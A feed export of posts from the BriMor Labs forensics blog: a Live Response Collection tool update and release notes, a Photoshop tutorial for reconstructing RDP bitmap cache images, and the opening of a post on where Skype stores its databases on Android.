tag:blogger.com,1999:blog-15473891556594195332024-03-05T18:17:44.917-05:00BriMor LabsWelcome to the BriMor Labs blog. BriMor Labs is located near Baltimore, Maryland. We specialize in offering Digital Forensics, Incident Response, and Training solutions to our clients.
Now with 1000% more blockchain!Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.comBlogger59125tag:blogger.com,1999:blog-1547389155659419533.post-20312151048683949062019-09-05T11:23:00.003-04:002019-10-17T11:16:04.117-04:00Small Cedarpelta Update<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Good morning readers and welcome back! This is going to be a very short blog post to inform everyone that a very minor update to the Cedarpelta version of the Live Response Collection has been published. This change was needed, as it was pointed out by an anonymous comment, that when a user chose one of the three "Secure" options, the script(s) failed due to an update to the SDelete tool. I changed the module to ensure that it works properly with the new version of the executable and published the update earlier this morning. As always, if you have any feedback or would like to see additional data be collected by the LRC, please let me know!</span><br />
<br />
<span style="font-size: large;"><br /><a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a> <br /><br />MD5: 7bc32091c1e7d773162fbdc9455f6432<br />SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63<br />Updated: September 5, 2019</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-73444040394180185182019-06-20T14:58:00.002-04:002019-06-20T14:58:45.382-04:00Phinally Using Photoshop to Phacilitate Phorensic Analysis<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<span style="font-size: large; text-align: start;">Hello again readers, and welcome back! Today's blog post is going to cover the process that I personally use to rearrange and correlate RDP Bitmap Cache data in Photoshop. Yes, I am aware that some of you know me primarily for my Photoshop productions in presentations and logos (and HDR photography, a hobby I do not spend nearly enough time on!), but the time has finally come when I can utilize Photoshop as part of my forensic analysis process!</span><br />
<div style="text-align: left;">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">First off, if you are not aware, when a user establishes an RDP (Remote Desktop Protocol) connection, there are files that are typically saved on the user’s system (the source host). These files have changed in name and in format over the years, but commonly are stored under the path “%USERPROFILE%\AppData\Local\Microsoft\Terminal Server Client\Cache\”. You will usually have a file with a .bmc extension, and on Windows 7 and newer systems, you will also likely see files</span><span style="background-color: transparent; font-family: inherit; font-size: large;"> that are named “cache000.bin” (these are incrementally numbered starting at 0000). This was introduced on Windows 7 and should be searchable by the naming convention of “cache{4-digits}.bin”. Both files contain what are essentially small chunks of screenshots that are saved of the remote desktop. The most reliable tool that I have found to parse this data is bmc-tools, which can be downloaded from <a href="https://github.com/ANSSI-FR/bmc-tools" style="background-color: transparent; font-family: inherit;">https://github.com/ANSSI-FR/bmc-tools</a>. The process for extracting the data is straight-forward, you point the script at a cache####.bin file, and extract it to a folder of your choice. Once done, you end up with a folder filled with small bitmap images.</span></div>
</div>
<div style="text-align: left;">
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now begins the phun part! </span><span style="font-size: large;">The bitmaps will need to be rearranged manually to reconstruct the screenshot as best as is possible (like a jigsaw for forensic enthusiasts). </span><span style="font-size: large;">This is not an exact science, and it relies on educated best-guess in many cases. </span><span style="font-size: large;">While this could be a more manual and tedious process, Adobe Photoshop can be used to automate the import of the files. Then you can rebuild the item(s) as you see fit!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">First, view the contents of the folder in Windows Explorer, or Adobe Bridge (included in Adobe Photoshop CC bundle) for Mac users. I found Preview does not work, it does not render the bitmaps properly.</span><span style="font-size: large;"> Rather than spending valuable time trying to figure out why that is, I just used Bridge. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Next select the bitmaps of the activity you’d like to reconstruct, go into Photoshop, and choose </span><span style="font-size: large;">"File-Scripts-Load Files into Stack...":</span></div>
<span style="font-size: large; text-align: start;"></span><br />
<span style="font-size: large; text-align: start;">
</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9EhKUzsZfik8SS1uFvKPSU8bELC6egh_lUPD7t8uYAWJy-tyk_zWA8eCXa8o0UnElVRJENP5QWPWNfh7nk6GpT7ZlNdK_gR5FCHTvtskqAbna3X1sOF_cfuo8ONWl8a1dE592UUOBIh2/s1600/PhotoshopCC-Scripts-LoadFilesStack.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="800" data-original-width="1105" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9EhKUzsZfik8SS1uFvKPSU8bELC6egh_lUPD7t8uYAWJy-tyk_zWA8eCXa8o0UnElVRJENP5QWPWNfh7nk6GpT7ZlNdK_gR5FCHTvtskqAbna3X1sOF_cfuo8ONWl8a1dE592UUOBIh2/s640/PhotoshopCC-Scripts-LoadFilesStack.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption"><span style="font-size: small;"><i>Photoshop fortunately has a script to import multiple files into one workspace (it is called a "Stack")</i></span></td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;">This will allow you to choose multiple files, to import into Photoshop all at once. </span><span style="font-size: large;">You will be presented with a “Load Layers” option. Select the “Browse” button, and then browse to the folder that contains the bitmap files you wish to load:</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu4rhA_NhzF8jtadp7TBVpkMuWl_xEk6IvELV8e2naaYXXel857X3sw-A1Y0mjxBWvZf7L86B9ghi-oQdT16Mu-orotSH2edIMR_QysFngywU8978h04zU3tEOa4g_fFLPti9S624Vcqg9/s1600/Screen+Shot+2019-06-20+at+11.17.47+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="574" data-original-width="691" height="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu4rhA_NhzF8jtadp7TBVpkMuWl_xEk6IvELV8e2naaYXXel857X3sw-A1Y0mjxBWvZf7L86B9ghi-oQdT16Mu-orotSH2edIMR_QysFngywU8978h04zU3tEOa4g_fFLPti9S624Vcqg9/s640/Screen+Shot+2019-06-20+at+11.17.47+AM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The "Load Layers" dialogue box. In order to choose the file(s) you want to open, click "Browse..."</span></i></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tOF0P40BjOt3ZSHkx-__NS86RRVSPSEOnFPLCGEkq2z9a4ZoaB3vkwb_fQM8VVHrfVb0ab5NGtRqvbsBGjupRttShR-_oJuPdYNhaNGG9TiUeQT5c4Ba8FEc8NDpfJYyFugPl9GVVdzO/s1600/Load_Files_Into_Stack.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="563" data-original-width="691" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tOF0P40BjOt3ZSHkx-__NS86RRVSPSEOnFPLCGEkq2z9a4ZoaB3vkwb_fQM8VVHrfVb0ab5NGtRqvbsBGjupRttShR-_oJuPdYNhaNGG9TiUeQT5c4Ba8FEc8NDpfJYyFugPl9GVVdzO/s640/Load_Files_Into_Stack.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose the files that you wish to load</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you’ve selected the bitmap files, you will see the “Load Layers” box is populated with those files:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI9DGfuJGH4IMOUYtIVoXt_bdhrGDOdJ7nf3hpUp-g5aJeT6gJHxelBBDRobjBEU2UpxM_NrBeNUNu3aj1ofbbglBAo7i8QUle7FFqJ3uflNtCdMye-RTdkRu1ZRwRw_y3IZ2DDNdgjkTE/s1600/LoadLayers.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="382" data-original-width="554" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI9DGfuJGH4IMOUYtIVoXt_bdhrGDOdJ7nf3hpUp-g5aJeT6gJHxelBBDRobjBEU2UpxM_NrBeNUNu3aj1ofbbglBAo7i8QUle7FFqJ3uflNtCdMye-RTdkRu1ZRwRw_y3IZ2DDNdgjkTE/s640/LoadLayers.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;"><i><span style="font-size: small;">After selecting the files, the "Load Layers" box will now be populated</span></i></td></tr>
</tbody></table>
<span style="font-size: large; text-align: start;"></span><br />
<div style="text-align: left;">
<span style="font-size: large; text-align: start;">Click "OK", and the importing process will begin. This might take a little while depending on the number of images you selected. Once the import is complete, a new workspace with each file being loaded in as a layer will be created. Highlight all of the layers (scroll to the top, and click on the top entry, and scroll to the bottom and click on the bottom entry holding "Shift"), then copy the layers. You can now paste the results into your original workspace, and you can rearrange and rename the layers with whatever you'd like in an effort to reconstruct the activity:</span></div>
<span style="font-size: large; text-align: start;">
</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" data-original-height="467" data-original-width="237" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIFpMzZzmKPU61ZqQ5pU_a7xTyIi0e6aNHjHzqffE_Rao_fmhNaBXnjtTSTDC0-tHx_zpQlQj1ArNLDBjMJ59pU_m_nEOgxTNEm5s9pjAhz_b5HuguGd03EpjpzgJhS4_L2QBU6fp_-ut4/s640/LayersLoaded_New-Window.png" style="margin-left: auto; margin-right: auto;" width="324" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;"><i><span style="font-size: small;">Select all of the layers and copy them</span></i></td></tr>
</tbody></table>
<div style="font-size: medium; text-align: start;">
</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP0DCwN5KxIsYFBbCY89QeUrL8x5UmLp0ZdX5X__XaPlAwIyPXtTyh0_lcN0YEj9vPf9bQRCkE1PJcCOkswBj6wgZ4XmUPT2mjNP99ttj1hmbjjbQPDSnHhTITDdpLZnIRpbPcioskih6Y/s1600/Copy_All-Layers.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: justify;"><span style="color: black;"><img border="0" data-original-height="360" data-original-width="233" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP0DCwN5KxIsYFBbCY89QeUrL8x5UmLp0ZdX5X__XaPlAwIyPXtTyh0_lcN0YEj9vPf9bQRCkE1PJcCOkswBj6wgZ4XmUPT2mjNP99ttj1hmbjjbQPDSnHhTITDdpLZnIRpbPcioskih6Y/s640/Copy_All-Layers.png" width="414" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Paste the layers into your original workspace, and rearrange them to rebuild the activity!</i> </span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" data-original-height="426" data-original-width="572" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMi-ZxZuPVImjjXL3GFjVDUbwDfQvBzG1qZ43_1VO7RZl7LJFuuLqDBwg2W4r1TkgM3RJff2KLY3p7mYeJlx7kVfdtD2MT4x8DHY8lLPxjRUEo4kAQQ0KaW9ZUocjLxdYD9aELuW9QP7wu/s640/Rearrange-Profit.png" style="margin-left: auto; margin-right: auto;" width="640" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;"><span style="font-size: small;"><i>This is an example of the partial output you can recover from rearranging the files to rebuild a window</i></span></td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMi-ZxZuPVImjjXL3GFjVDUbwDfQvBzG1qZ43_1VO7RZl7LJFuuLqDBwg2W4r1TkgM3RJff2KLY3p7mYeJlx7kVfdtD2MT4x8DHY8lLPxjRUEo4kAQQ0KaW9ZUocjLxdYD9aELuW9QP7wu/s1600/Rearrange-Profit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a><br /></span></div>
<span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMi-ZxZuPVImjjXL3GFjVDUbwDfQvBzG1qZ43_1VO7RZl7LJFuuLqDBwg2W4r1TkgM3RJff2KLY3p7mYeJlx7kVfdtD2MT4x8DHY8lLPxjRUEo4kAQQ0KaW9ZUocjLxdYD9aELuW9QP7wu/s1600/Rearrange-Profit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a><br /></span>
<span style="font-size: large;"><br />I truly hope that this small tutorial helps with your process </span><span style="font-size: large;">and workload should you find yourself rebuilding RDP session activity. For readers who do not currently own Photoshop, Adobe has </span><span style="font-size: large;">a very inexpensive offering of the Adobe Creative Cloud (CC) for a personal license under the Photography plan, which is</span><span style="font-size: large;"><span style="font-size: medium;"> </span><a href="https://www.adobe.com/creativecloud/plans.html?" rel="nofollow" target="_blank">$9.99 a month.</a></span><span style="font-size: large;"> It is a great deal and one that I have used for my photography hobby for many years. And now on forensic analysis cases that involve RDP bitmap reconstruction! </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com1tag:blogger.com,1999:blog-1547389155659419533.post-78599747638020551842019-04-11T14:13:00.001-04:002019-10-17T11:16:16.083-04:00Live Response Collection - Cedarpelta<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-size: large; text-align: start;">Hello again readers and welcome back!! Today I would like to announce the public release of updates to the Live Response Collection (LRC), which is named "Cedarpelta". </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCR4cUaLqn7ml54SYEs_ipvuOicA8830w3-0RM3h3FR2-S9uKQFO1vKOUb6Ow4cky9qeIdrFOHACQ1_6az3UtyPh3Ae8yUN5o8mu9_VRrkkB8WjaDu5OV7143eCOrKjFy4kGy6R0ekRlt4/s1600/logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="350" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCR4cUaLqn7ml54SYEs_ipvuOicA8830w3-0RM3h3FR2-S9uKQFO1vKOUb6Ow4cky9qeIdrFOHACQ1_6az3UtyPh3Ae8yUN5o8mu9_VRrkkB8WjaDu5OV7143eCOrKjFy4kGy6R0ekRlt4/s320/logo.jpg" width="320" /></a></div>
<span style="font-size: large;"><br /><br />This may come as a surprise to some as Bambiraptor was released over two years ago, but over the past several months I've been working on adding more macOS support to the LRC. Part of the work that went into this version was a complete rewrite of all of the bash scripts that the LRC utilizes, which was no small task. Once the rewrite was completed, then I focused on my never-ending goal of blending speed, comprehensive data collection, and internal logic to ensure that if something odd was encountered, the script would not endlessly hang or, even worse, collect data that was corrupted or not accurate. So, lets delve into some of the changes that Cedarpelta offers compared to Bambiraptor!</span><br />
<span style="font-size: large;"><br /><br /><b>Windows Live Response Collection</b><br />To be honest, not a whole lot has changed on the Windows side. I added a new module at the request of a user, that collects Cisco AMP databases from endpoints, if the environment utilizes the FireAMP endpoint detection product. The primary reason for this is that the databases themselves contain a WEALTH of information, however users of the AMP console are limited to what they can see from the endpoints. The reason for this is likely because it would take a large amount of bandwidth and processing power to process every single item collected by the tool. Since most of this occurs within AWS, the processing costs would scale considerably, which in the end would end up costing more money to license and use.* (<i>*Please note that I am not a FireAMP developer, and I do not know if this is definitely the case or not, but from my outsider perspective and experience in working with the product, this explanation is the most plausible. If any developers would like to provide a more detailed explanation, I will update this post accordingly!</i>)</span><br />
<span style="font-size: large;"><br /><br /><b>MacOS Live Response Collection</b><br />This is the section that has had, by far, the most work done to it. On top of the code rewrite, which makes the scripting more "proper" and also much, much faster, new logic was added to deal with things like system integrity protection (SIP) and files/folders that used to be accessible by default, but now are locked down by the operating system itself. Support has been added for:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"> - Unified Logs</span><br />
<span style="font-size: large;"> - SSH log files</span><br />
<span style="font-size: large;"> - Browser history files (Safari, Chrome, Tor, Brave, Opera)<br /> - LSQuarantine events<br /> - Even more console logs<br /> - And many, many other items!<br /><br />One of the downsides to the changes to macOS is the fact that things like SIP and operating system lock downs prevent a typical user from accessing data from certain locations. One example of this is Safari, where by default you cannot copy your own data out of the Safari directory because of the OS protections in place. There are ways around this, by disabling SIP and granting the Terminal application full disk access under Settings, but since the LRC was written to work with a system that is running with default configurations, it will attempt to access these protected files and folders, and if it cannot, it will record what it tried to do and simply move on. Some updates that are in the pipeline for newer version of macOS may also require additional changes, but we will have to wait for those changes to occur first and then make the updates accordingly.<br /><br />You will most likely no longer be able to perform a memory dump or automate the creation of a disk image on newer versions of macOS with the default settings, because of the updates and security protections native within the OS internals. As I have stated in the past, if you absolutely require these items I highly recommend a solution such as Macquisition from BlackBag. The purpose of the LRC is, and will always be, to collect data from a wide range of operating systems in an easy fashion, and require little, if any, user input. It does not matter if you are an experienced incident response professional, or directed to collect data from your own system by another individual, you simply run the tool, and it collects the data.</span><br />
<span style="font-size: large;"><br /><br /><b>Future Live Response Collection development plans</b><br />As always, the goal of the Live Response Collection is not only to collect data for an investigation, it is also able to be customized by any user to collect information and/or data that is desired by that user. Please consider taking the time to develop modules that extract data and share modules that you have already developed. The next update of the LRC will focus on newer versions of Windows (Windows 10, Server 2019, etc). I personally am still encountering very few of those systems in the wild, but that is mostly because I tend to deal with larger enterprises where adoption of a new operating system takes considerable time, compared to a typical user that runs down to Best Buy and has a new Windows 10 laptop because the computer they used for a few years no longer works.<br /><br /><br /><b>Remember, a tool is a tool. It is never the final solution</b><br />One last note that I would like to add is that please remember that while a lot of work has been put into the LRC to "just work", at the end of the day, it is just a tool that is meant to be used to enhance the data collection process. There are many open source tools that are available to collect data, perhaps more than ever before, and one tool may work where another one failed. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">For example, you might try the <a href="https://github.com/CrowdStrike/automactc" target="_blank">CrowdStrike Mac</a> tool and it might work where the LRC fails, or vice versa. Or you may try to use <a href="https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape" target="_blank">Eric Zimmerman's kape</a> on a Windows machine, but it fails because the .NET Framework was not installed. Or you might try to use the LRC on a system running <a href="https://www.cylance.com/en-us/platform/products/index.html" target="_blank">Cylance Protect</a> and it gets blocked because of the "process spawning process" rule. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In each case you have to give various tools and methods a shot, with the end goal of collecting the information that you want. It is important to remember that YOU (the user of the tool) are the most valuable aspect of the data collection process, and you simply utilize tools to make the collection process faster and smoother!<br /><br /><br /><a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a> <br /><br />MD5: 7bc32091c1e7d773162fbdc9455f6432<br />SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63<br />Updated: September 5, 2019</span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com2tag:blogger.com,1999:blog-1547389155659419533.post-19961618144409446332018-11-27T16:04:00.001-05:002018-11-29T08:34:00.829-05:00Skype Hype/Gripe<br />
<span style="font-size: large;">Hello again readers and welcome back! Based off the title of this blog post, I am pretty sure that you already know that we will be covering Skype in this post. As with any good story, it is best to start at the beginning of this magical journey....</span><br />
<span style="font-size: large;"><br /></span>
<b><span style="font-size: large;">Chapter 1: Data generation</span></b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As some of you may know, I have been involved with the <a href="http://cybersleuthlab.org/" target="_blank">Cyber Sleuth Science Lab</a> since this summer, working on bringing STEM (specifically digital forensics) to high school aged students. This project requires a tremendous amount of behind the scenes work, especially in the scenario data generation realm. For the next phase of the project, we decided that utilizing Skype would be the best chat application to use, because not only could we generate data across several platforms, but we can also extract it in a reliable method from mobile devices. So, I created some Skype conversations on my test device (a Samsung Galaxy S6 Edge, specifically SM-G925F (remember the model number, you will see it again)), made a full image of it, and loaded it into Magnet AXIOM, which the folks at Magnet Forensics have generously made available to the Cyber Sleuth participants. And, surprisingly, I was met with this:</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EKt1Bi93ZT_sNFGZwl5KqocOgV-dO8eNtt7mO6OMfS7BbvgmELPaTt-3HixzoZgKgzBvyhN7tnUzuGvuZTkkZ0NL-soHeYGjk0bXurO2FgWftj2MV_dgmGnn7GZNM_XLhd4Bp6lCdGRC/s1600/AXIOM-SShot-Skype.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="448" data-original-width="1356" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EKt1Bi93ZT_sNFGZwl5KqocOgV-dO8eNtt7mO6OMfS7BbvgmELPaTt-3HixzoZgKgzBvyhN7tnUzuGvuZTkkZ0NL-soHeYGjk0bXurO2FgWftj2MV_dgmGnn7GZNM_XLhd4Bp6lCdGRC/s640/AXIOM-SShot-Skype.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Processing in AXIOM found the "main.db" file, but nothing else</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br />Obviously I knew something wasn't right, as I definitely populated data in the application, which I could easily see. But it was not detected in AXIOM, so I had to dig into this a bit more.<br /><br /><br /><b>Chapter 2: A sorta "new" discovery. Kinda-ish</b></span><br />
<br />
<span style="font-size: large;">Obviously one of the main aspects in our career field is that we trust tools to extract known data from known places, but at any time that can change and we have to update our methods (and tools) accordingly. I told <a href="https://twitter.com/B1N2H3X" target="_blank">Jessica</a> about a possible new discovery when I found this at the beginning of November, which I had to put aside for a few weeks as I took part in an incident response case. This week I was able to jump back into it again, and worked on trying to figure out exactly "what" was happening here. Initially, the thought was that Skype had changed a whole bunch of stuff. As it turns out (thankfully) that is not quite the case, but it does bring up a couple of issues to keep in mind if you are looking at mobile devices with Skype usage.<br /><br />The first item to note is the presence of the file "main.db". Historically this was located under the "databases" folder, but now it is located under the "files" folder, specifically under the subfolder "live#<username>". </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrFkra3Nrv-FIuC0-zIYEvbx444m32OjHQK0c_PUesgmpP23HHX-PF8KPToCdNVsll6ne6Ab7Sdy7RDA2r0oiggOAWh13E7IzCVA24GC3PCnR9p33iOU_yGEVzMkI82-AYfJ89UuvcBbzI/s1600/WrongLocation.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="938" data-original-width="1600" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrFkra3Nrv-FIuC0-zIYEvbx444m32OjHQK0c_PUesgmpP23HHX-PF8KPToCdNVsll6ne6Ab7Sdy7RDA2r0oiggOAWh13E7IzCVA24GC3PCnR9p33iOU_yGEVzMkI82-AYfJ89UuvcBbzI/s640/WrongLocation.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The main.db file, historically, was not in this location</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZFV-TnO2_QWitPqAiY76jEhd5uWSxiYq9-i-uc46lYmr2YYCClB0R8Lb-lP19TyapoUo5Pxw03g-Ko2Mlexjlnft6-MXT0VO0HYCF8hxsFRooUPl8hBZSMsCE8S2f_bB7cWlUKligdb9/s1600/UpdatadMaindb.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="819" data-original-width="1600" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZFV-TnO2_QWitPqAiY76jEhd5uWSxiYq9-i-uc46lYmr2YYCClB0R8Lb-lP19TyapoUo5Pxw03g-Ko2Mlexjlnft6-MXT0VO0HYCF8hxsFRooUPl8hBZSMsCE8S2f_bB7cWlUKligdb9/s640/UpdatadMaindb.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Contents of "main.db". Notice the lack of data in the tables</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span><span style="font-size: large;">There is a "databases" folder though, so naturally the next step was to look there. Sure enough, this contained what looks like the database(s) we are looking for</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-47xVXiGSTbj2jlFMsul2Ijhcm4vKwg9tKBY2bfnFBa5Eh0nOJiui4C0N1Ft6Rs0xoCwgh8bkbIyzFqkE4QjCP7P2aZ8a6FwwYbANAcDWd-oPJW9Ezxp_vecyGe8AhsqoiZZbGmzOzuVG/s1600/NewDatabases.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="680" data-original-width="1186" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-47xVXiGSTbj2jlFMsul2Ijhcm4vKwg9tKBY2bfnFBa5Eh0nOJiui4C0N1Ft6Rs0xoCwgh8bkbIyzFqkE4QjCP7P2aZ8a6FwwYbANAcDWd-oPJW9Ezxp_vecyGe8AhsqoiZZbGmzOzuVG/s640/NewDatabases.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;"><i><span style="font-size: small;">The "new" contents of the "databases" folder</span></i></td></tr>
</tbody></table>
